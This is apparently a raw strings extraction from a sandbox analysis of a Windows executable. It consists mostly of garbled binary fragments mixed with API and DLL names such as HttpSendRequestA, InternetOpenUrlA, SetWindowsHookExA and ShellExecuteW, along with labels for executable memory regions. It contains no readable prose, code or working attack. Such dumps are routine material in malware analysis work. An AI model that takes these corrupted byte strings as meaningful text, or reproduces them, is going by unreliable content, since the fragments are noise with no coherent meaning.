_(b%x&%Ud6Cu.Ijt5B.onPl.lwz]1o-q(.BpHttpQueryInfoAInternetCanonicalizeUrlA%djNrPnRASAPI32.dllInternetOpenUrlAyb@-z}.dQ8$c.lX}w.CZS2Z.dm~3|tcpt)4%D"_.PNiPi.Xc'0Vh2}.zl\M.xwlF|.yz.vnP@01xs.lgnxZ(l.aS6H.SvvF`b7a;LÃ’.MxPUf4.VnU.etn`5#z.Mm.}OrD.XK5.uO\Hi~~a%DW8h*.vp6UDpzt.Ex73.uWX]0URLb.dg[ I.tW(jz.IL |%fZ(\.OpyP%dR UOOo.tzu.lA3"UL.Hq6G.GKPx.cW X07NZ#.yWVf.MZ07[^\%U-{L%Dtb(%XodO.tpy.PW^U1I.fx&eFiwH.ivnD.Wh5^:a9d.lZ?(ML{.Hhahb(b!O.eY`AUk.zoE=Z&,gV%X.Pnxl.rh[^.LD;3DAb!%ubd.jb_-d%X^Z.yb4Y<.fr><.mez>.EF%h%XNTyHttpSendRequestA1.0.1.10071, 0, 0, 1imedllhost09.ime1.0.0.0(*.*)%original file name%.exe_2956_rwx_0091A000_00002000:GetViewportExtExWININET.dllUnregisterHotKeyRegCloseKeyKERNEL32.dllGetWindowsDirectoryAInternetCrackUrlARegOpenKeyExABv.SCv=kAvu$B79%C%original file name%.exe_2956_rwx_00CC1000_00001000:SetViewportOrgExHttpQueryInfoACreateDialogIndirectParamASetWindowsHookExA%original file name%.exe_2956_rwx_6B583000_00162000:b$m%F.Rj$&|%s}\6b'.bgFMZ.Tkh<.dxm>:=%s-Va.GKdDa.DuKeyC%.DM%R`}4A.DLe[;%7X&s;Eh%S9W'-.DT_0Z6a.CXP,UU%.C8|%cm8JWeB{"%C,ZG-c}(&gkR.OCI#i.En%f|rIAU{/LMZWeBx7pGJ2k%sa$mÃj{eD.jU.DTkJ%Flu-J 4a.EVM~tL.Ofd:g.cOK[LOÀXy.DD9%XPk%X2Zo.Gx Wymm%C )k8%cmLb6uZ.JZ.aYf,.CT_2k-lÂ}KV%xH-`a.RCHTg.mI-w}N.XSt%.Cdan.Ch,`.WHGt-c}(,I.zf.eb_D5Nj.fRF"w.nW.RsP:^%Fg>n*!.Lyi.Ccp3cu.wEv.wPN[%F:o6a.wmr.wH"b!.Lum'u%.DiIRlm%CI2g|%c%S5l5.RcS_Im.wEQiRkeD.bWcm8Ã..DXF{.ji0`wV.ZU?E@J?Eô.Dpe.DLs&;b.Edy.Dp8!.zPi1z.qIvtQ.DlSrt-c}\.WA%m%1m.ISk_fr.CzAgr.fe=O0h.Uc\-Y%Fk@-l.Yx2%c|5K.fT44@$.wFX~.TkhwlG-c}\~3or=Bp.Cc;i.KM.ST.u.wEb[hExe {YZ;b.di9.DToq.Dl$"W1d=S.az)A%d.S.sK&Od:srXe%F#%D|=D.ryXU .fZCmDe%original file name%.exe_2956_rwx_6B6EF000_00001000:%.Dyy%original file name%.exe_2956_rwx_6B846000_00001000:VJ.wA EShellExecuteW